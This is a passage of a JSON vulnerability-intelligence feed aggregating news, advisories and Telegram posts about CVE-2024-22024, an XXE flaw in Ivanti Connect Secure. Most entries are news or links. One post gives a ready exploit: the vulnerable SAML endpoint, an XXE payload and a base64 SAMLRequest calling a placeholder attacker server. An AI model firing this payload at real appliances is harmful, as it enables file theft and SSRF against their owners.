\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0440\u0435\u0432\u0435\u0440\u0441-\u0438\u043d\u0436\u0438\u043d\u0438\u0440\u0438\u043d\u0433 \u0434\u043b\u044f \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0430 \u0432\u0435\u0440\u0441\u0438\u0438 9.1.18.2-24467.1, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0439 \u0432 \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u043c \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0438 Pulse Secure. \u0411\u044b\u043b\u043e \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043e, \u0447\u0442\u043e \u043e\u0441\u043d\u043e\u0432\u043e\u0439 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0441\u043b\u0443\u0436\u0438\u0442 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 CentOS 6.4, \u0431\u0430\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043d\u0430 Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u0430 11 \u043b\u0435\u0442 \u043d\u0430\u0437\u0430\u0434 \u0438 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 \u0442\u0440\u0451\u0445 \u043b\u0435\u0442.\n\n\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u043d\u043e\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043a \u044d\u0442\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u0432\u044b\u0437\u0432\u0430\u043d\u043e \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u043c \u0432\u0441\u043f\u043b\u0435\u0441\u043a\u043e\u043c \u0447\u0438\u0441\u043b\u0430 \u0430\u0442\u0430\u043a \u043d\u0430 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Ivanti, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Connect Secure, Policy Secure \u0438 ZTA-\u0448\u043b\u044e\u0437\u044b. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, \u0447\u0442\u043e \u0441\u0442\u0430\u0432\u0438\u0442 \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u0443 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\u0421\u0440\u0435\u0434\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u044b\u043b\u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u044b CVE-2023-46805 , CVE-2024-21887 \u0438 CVE-2024-21893 . \u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e, Ivanti \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-22024 , \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u043f\u0440\u043e\u0449\u0430\u0435\u0442 \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0437\u0430\u0449\u0438\u0449\u0451\u043d\u043d\u044b\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c.\n\n\u041e\u0442\u0447\u0451\u0442 Eclypsium \u043f\u043e\u0434\u0447\u0451\u0440\u043a\u0438\u0432\u0430\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0438\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u043e\u0432 \u0432 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 Pulse Secure, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044e Perl, \u043d\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0432\u0448\u0443\u044e\u0441\u044f \u043d\u0430 \u043f\u0440\u043e\u0442\u044f\u0436\u0435\u043d\u0438\u0438 23 \u043b\u0435\u0442, \u0438 \u0432\u0435\u0440\u0441\u0438\u044e \u044f\u0434\u0440\u0430 Linux, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u0440\u0435\u043a\u0440\u0430\u0442\u0438\u043b\u0430\u0441\u044c \u0432 2016 \u0433\u043e\u0434\u0443. \u0422\u0430\u043a\u0438\u0435 \u043d\u0430\u0445\u043e\u0434\u043a\u0438 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u044e\u0442 \u0440\u0438\u0441\u043a, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0439 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043d\u0435\u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f.\n\n\u0414\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432\u044b\u044f\u0432\u0438\u043b \u0431\u043e\u043b\u0435\u0435 1200 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0432 \u0441\u043a\u0440\u0438\u043f\u0442\u0430\u0445 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u0438 \u0441\u0432\u044b\u0448\u0435 5000 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0444\u0430\u0439\u043b\u0430\u0445 Python, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044f \u043d\u0430 \u0433\u043b\u0443\u0431\u043e\u043a\u0438\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0435. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0431\u044b\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e 133 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0438\u0445 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430, \u0447\u0442\u043e \u0443\u0441\u0443\u0433\u0443\u0431\u043b\u044f\u0435\u0442 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e \u0435\u0449\u0451 \u0431\u043e\u043b\u044c\u0448\u0435.\n\n\u041e\u0441\u043e\u0431\u043e\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u0431\u044b\u043b\u043e \u0443\u0434\u0435\u043b\u0435\u043d\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0446\u0435\u043b\u043e\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e Ivanti. \u042d\u0442\u043e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0445 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439, \u0447\u0442\u043e \u0442\u0435\u043e\u0440\u0435\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435, \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u044f \u00ab\u043b\u043e\u0436\u043d\u043e\u0435 \u0447\u0443\u0432\u0441\u0442\u0432\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u00bb.\n\n\u041d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u044d\u0442\u0438\u0445 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0439 Eclypsium \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0442\u0435\u043e\u0440\u0435\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0430\u0442\u0430\u043a\u0443, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0433 \u0431\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043d\u043e\u0441\u0442\u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0446\u0435\u043b\u043e\u0441\u0442\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0441\u043a\u0440\u044b\u0442\u043d\u043e\u0433\u043e \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Eclypsium \u043f\u0440\u0438\u0448\u043b\u0438 \u043a \u0432\u044b\u0432\u043e\u0434\u0443, \u0447\u0442\u043e \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u0438 \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u043b\u0436\u043d\u044b \u0432\u044b\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u043e\u0442\u043a\u0440\u044b\u0442\u0443\u044e \u0438 \u043f\u0440\u043e\u0437\u0440\u0430\u0447\u043d\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u0438 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u0441\u0432\u043e\u0438\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432, \u0434\u0430\u0432\u0430\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u043c \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0446\u0435\u043d\u0438\u0432\u0430\u0442\u044c \u0438\u0445 \u0446\u0435\u043b\u043e\u0441\u0442\u043d\u043e\u0441\u0442\u044c \u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c.\n\n\u00ab\u0427\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0431\u0443\u0434\u0435\u0442 \u044d\u0442\u043e\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441, \u0442\u0435\u043c \u043b\u0443\u0447\u0448\u0435 \u043c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0446\u0438\u0444\u0440\u043e\u0432\u043e\u0439 \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a\u00bb, \u2014 \u0437\u0430\u043a\u043b\u044e\u0447\u0438\u043b\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2024-02-19T11:52:46.000000Z"}, {"uuid": "9587c83d-4c61-4eb4-be35-a329aa915834", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6587", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-22024 vulnerability in Ivanti Connect Secure\nURL\uff1ahttps://github.com/labesterOct/CVE-2024-22024\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-10T06:26:51.000000Z"}, {"uuid": "8bdb86fb-947d-4394-8c14-c35a3bb3a8e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6582", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCheck for CVE-2024-22024 vulnerability in Ivanti Connect Secure\nURL\uff1ahttps://github.com/0dteam/CVE-2024-22024\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-09T14:35:27.000000Z"}, {"uuid": "6f32849a-0e87-4052-aa7a-59b2e68aa4ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/cybersecplayground/37", "content": "CVE-2024-22024,  XXE on Ivanti Connect Secure\n\npayload , encode it to base64:\n\n %xxe;]&gt;\n\n  send it to  127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest \n\n#bugbountytips #cve #infosec", "creation_timestamp": "2025-01-15T19:02:47.000000Z"}, {"uuid": "e4dc3635-7534-4826-81eb-f43c8140ec8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "https://t.me/CyberGovIL/1917", "content": "[\u05e2\u05d3\u05db\u05d5\u05df5] \u05d4\u05ea\u05e8\u05e2\u05d4 \u05d3\u05d7\u05d5\u05e4\u05d4: \u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea \u05e7\u05e8\u05d9\u05d8\u05d9\u05d5\u05ea \u05d1\u05de\u05d5\u05e6\u05e8\u05d9 Ivanti\n\n[\u05e2\u05d3\u05db\u05d5\u05df5] \u05dc\u05d0\u05d7\u05e8\u05d5\u05e0\u05d4 \u05e4\u05e8\u05e1\u05de\u05d4 \u05d7\u05d1\u05e8\u05ea Ivanti \u05de\u05d9\u05d3\u05e2 \u05e2\u05dc 5 \u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea \u05e7\u05e8\u05d9\u05d8\u05d9\u05d5\u05ea \u05d1\u05de\u05d5\u05e6\u05e8\u05d9\u05d4.\n\n[\u05e2\u05d3\u05db\u05d5\u05df5] \u05d7\u05dc\u05e7 \u05de\u05d4\u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea \u05d1\u05de\u05d5\u05e6\u05e8\u05d9 VPN \u05de\u05e1\u05d5\u05d2 Ivanti Connect/Policy Secure \u05e0\u05d9\u05ea\u05e0\u05d5\u05ea \u05dc\u05e9\u05e8\u05e9\u05d5\u05e8, \u05d1\u05d0\u05d5\u05e4\u05df \u05d4\u05de\u05d0\u05e4\u05e9\u05e8 \u05d4\u05e9\u05ea\u05dc\u05d8\u05d5\u05ea \u05de\u05e8\u05d7\u05d5\u05e7 \u05e2\u05dc \u05d4\u05e6\u05d9\u05d5\u05d3 \u05dc\u05dc\u05d0 \u05e6\u05d5\u05e8\u05da \u05d1\u05d4\u05d6\u05d3\u05d4\u05d5\u05ea. \u05e4\u05d2\u05d9\u05e2\u05d5\u05d9\u05d5\u05ea \u05d0\u05dc\u05d4 \u05de\u05e0\u05d5\u05e6\u05dc\u05d5\u05ea \u05d1\u05e4\u05d5\u05e2\u05dc \u05e2\u05dc \u05d9\u05d3\u05d9 \u05ea\u05d5\u05e7\u05e4\u05d9\u05dd \u05e8\u05d1\u05d9\u05dd \u05d1\u05e2\u05d5\u05dc\u05dd.\n\n[\u05e2\u05d3\u05db\u05d5\u05df4] \u05d9\u05e9 \u05dc\u05d1\u05d7\u05d5\u05df \u05d5\u05dc\u05d4\u05ea\u05e7\u05d9\u05df \u05de\u05d9\u05d9\u05d3\u05d9\u05ea \u05d0\u05ea \u05d0\u05d7\u05ea \u05d4\u05d2\u05e8\u05e1\u05d0\u05d5\u05ea \u05d4\u05e2\u05d3\u05db\u05e0\u05d9\u05d5\u05ea, \u05d2\u05dd \u05d0\u05dd \u05d4\u05d3\u05d1\u05e8 \u05de\u05d7\u05d9\u05d9\u05d1 \u05e9\u05d3\u05e8\u05d5\u05d2 \u05de\u05d2\u05e8\u05e1\u05d4 \u05d9\u05e9\u05e0\u05d4 \u05d9\u05d5\u05ea\u05e8, \u05d0\u05d5 \u05d0\u05e3 \u05e9\u05e0\u05de\u05d5\u05da \u05de\u05d2\u05e8\u05e1\u05d4 \u05d2\u05d1\u05d5\u05d4\u05d4 \u05d9\u05d5\u05ea\u05e8. \u05d4\u05de\u05d4\u05dc\u05da \u05de\u05d7\u05d9\u05d9\u05d1 \u05d1\u05d9\u05e6\u05d5\u05e2 Factory Reset \u05dc\u05e6\u05d9\u05d5\u05d3, \u05d5\u05e6\u05e2\u05d3\u05d9\u05dd \u05de\u05e9\u05dc\u05d9\u05de\u05d9\u05dd \u05e0\u05d5\u05e1\u05e4\u05d9\u05dd, \u05db\u05de\u05e4\u05d5\u05e8\u05d8 \u05dc\u05d4\u05dc\u05df \u05d5\u05d1\u05e7\u05d9\u05e9\u05d5\u05e8\u05d9\u05dd \u05d4\u05e9\u05d5\u05e0\u05d9\u05dd \u05d1\u05e1\u05e2\u05d9\u05e3 \"\u05de\u05e7\u05d5\u05e8\u05d5\u05ea\".\n\n[\u05e2\u05d3\u05db\u05d5\u05df5] \u05de\u05d9 \u05e9\u05d1\u05d9\u05e6\u05e2 Factory Reset, \u05d9\u05e9 \u05dc\u05d5\u05d5\u05d3\u05d0 \u05db\u05d9 \u05de\u05d5\u05ea\u05e7\u05e0\u05ea \u05d1\u05e6\u05d9\u05d5\u05d3 \u05d2\u05e8\u05e1\u05d4 \u05d4\u05db\u05d5\u05dc\u05dc\u05ea \u05de\u05e2\u05e0\u05d4 \u05dc\u05e4\u05d2\u05d9\u05e2\u05d5\u05ea \u05d4\u05d7\u05d3\u05e9\u05d4 \u05d1\u05d9\u05d5\u05ea\u05e8, \u05de\u05e1\u05d5\u05d2 XXE, \u05e9\u05de\u05d6\u05d5\u05d4\u05d4 \u05db-CVE-2024-22024.\n\n\n\u05dc\u05d4\u05e6\u05d8\u05e8\u05e4\u05d5\u05ea \u05dc\u05e7\u05d1\u05dc\u05ea \u05d4\u05ea\u05e8\u05d0\u05d5\u05ea \ud83d\udd17\n\u05d5\u05d5\u05d0\u05d8\u05e1\u05d0\u05e4 https://shortlnk.net/WhatsApp\n\u05d8\u05dc\u05d2\u05e8\u05dd https://shortlnk.net/Telegram", "creation_timestamp": "2024-02-12T20:00:49.000000Z"}, {"uuid": "fc3c0edf-a38f-4d2d-9dcc-23f4d5415470", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "Telegram/FlCG5LHxOyxbJAP3jkFGCzZkhlV9IyY5CC8_DUjXpFJmJI9I", "content": "", "creation_timestamp": "2024-02-12T09:02:26.000000Z"}, {"uuid": "f71bf5b6-ffa8-4947-bbfa-42a86b8c14cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "Telegram/vvENguxMk6egBjpdPte27ShgOijri6nw2CqaYkwfnwCVOw", "content": "", "creation_timestamp": "2024-02-09T08:39:53.000000Z"}, {"uuid": "b2483eea-155a-45d5-93ec-473ede724e09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/cybersecplayground/207", "content": "\ud83d\udea8 CVE-2024-22024 - Ivanti Connect Secure XXE Exploit (SAMLRequest Injection)\n\n\ud83d\udee0 This critical vulnerability allows XML External Entity (XXE) injection via a crafted SAMLRequest parameter \u2014 enabling attackers to read internal files, SSRF, or exfiltrate data.\n\n\ud83e\udde0 Vulnerable Endpoint:\nPOST /dana-na/auth/saml-sso.cgi\n\n\ud83d\udce6 Injection Vector:\nThe vulnerability is triggered when the server processes a malicious SAMLRequest (XML-based SAML input) containing an external entity.\n\n\ud83d\udca5 Exploit Payload (Before Encoding):\n\n\n  %xxe;\n]&gt;\n\n\ud83d\udd10 Replace {{attacker-server}} with your Burp Collaborator or HTTP listener.\n\n\ud83e\uddec Base64-Encoded Payload:\nEncode the full XML above using base64, then send it as a SAMLRequest parameter like:\nPOST /dana-na/auth/saml-sso.cgi\nContent-Type: application/x-www-form-urlencoded\nSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxET0NUWVBFIG5hbWU9InJvb3QiIFtdPCEtLSFFTlRJVFkgJSB4eGUgU1lTVEVNICJodHRwOi8ve3thdHRhY2tlci1zZXJ2ZXJ9fS94Ij4gJSB4eGU7XT48cj48L3I+\n\ud83d\udd0e Tip: Always double-check the encoding and test with tools like Burp Suite or Postman.\n\n\ud83d\udcd6 Reference:\n\ud83d\udd17 CVE Info\n\ud83d\udcdc Ivanti Advisory\n\ud83d\udd25 CVE-2024-22024 POC\n\n\ud83d\udd25 Impact: File read, SSRF, possible credential theft.\n\ud83d\udca1 Mitigation: Update to the latest patched version. Disable XML entity resolution on the parser.\n\n\ud83d\udce2 For more critical CVEs, PoCs, and bug bounty tactics, join us at \ud83d\udc49 @cybersecplayground\n\n\ud83d\udcac Like &amp; Share to support the community.\n#bugbountytips #cve #infosec #xxe #saml #ivanti #exploit #cybersecurity #bugbounty #cybersec", "creation_timestamp": "2025-05-19T14:15:20.000000Z"}, {"uuid": "eded76d3-5281-4935-b386-7be3f9498c67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "Telegram/UffJClJk_0j9_vo8Q6KHNXvHVTcRcy9lG8_oz1Z_Zn6_-feZ", "content": "", "creation_timestamp": "2024-02-11T23:45:12.000000Z"}, {"uuid": "6950095d-cc07-4d91-acd7-d6e6851c5bb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "Telegram/72bP_1Q6gZH8f_-8hgHYVHmcicP7WNPey3onZWFVosq2bkOo", "content": "", "creation_timestamp": "2024-02-11T23:42:57.000000Z"}, {"uuid": "ca11ee72-948f-4d55-99e7-b6cf36858115", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3437", "content": "#ExploitObserverAlert\n\nPD/http/cves/2024/CVE-2024-22024\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to PD/http/cves/2024/CVE-2024-22024. Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.", "creation_timestamp": "2024-02-11T16:20:30.000000Z"}, {"uuid": "42b5203b-89e1-4c70-9882-dd614a300a9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "Telegram/2ZJRl6kj35bpV8cE0y3_laNFG0_cPupuWOOpZwB2O4Aai5A", "content": "", "creation_timestamp": "2024-03-24T06:43:04.000000Z"}, {"uuid": "c8f5b12a-c7b4-4d50-8d03-6607377178b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "published-proof-of-concept", "source": "Telegram/zxaSsjdg-TBfBZr55_hYQRBkBmwDlzaw5Wh1oTdJjucLfdA", "content": "", "creation_timestamp": "2025-01-15T07:51:34.000000Z"}, {"uuid": "decb85d7-0ed4-4290-a55c-d4ed6fd1ca79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "Telegram/3_EbQorj8QvRZSA5UObdFtwCazXdKk2CkldD1f8gRQCeXw", "content": "", "creation_timestamp": "2024-02-09T05:23:22.000000Z"}, {"uuid": "f618e2cb-122f-4bf6-bbf8-109b844e3f1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "https://t.me/KomunitiSiber/1465", "content": "Warning: New Ivanti Auth Bypass Flaw Affects Connect Secure and ZTA Gateways\nhttps://thehackernews.com/2024/02/warning-new-ivanti-auth-bypass-flaw.html\n\nIvanti has alerted customers of yet another high-severity security flaw in its Connect Secure, Policy Secure, and ZTA gateway devices that could allow attackers to bypass authentication.\nThe issue, tracked as\u00a0CVE-2024-22024, is rated 8.3 out of 10 on the CVSS scoring system.\n\"An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti", "creation_timestamp": "2024-02-09T05:06:51.000000Z"}, {"uuid": 